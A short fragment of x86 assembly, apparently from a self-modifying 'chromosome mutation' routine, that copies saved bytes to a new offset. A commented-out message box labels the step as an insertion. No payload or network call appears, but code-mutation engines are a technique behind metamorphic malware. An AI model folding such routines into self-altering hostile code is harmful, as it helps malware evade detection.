|
||
|
mov edi, [change_byte_offset] ; edi=destination
|
||
|
xor ecx, ecx ; ecx=0
|
||
|
mov cl, [change_byte_value] ; ecx=length
|
||
|
rep movsb ; Write saved part to the new place
|
||
|
|
||
|
; invoke MessageBox, 0x0, "Inseration", "Chromosome Mutation", 0x0
|
||
|
jmp endofmutation
|
||
|
|
||
|
.end start
|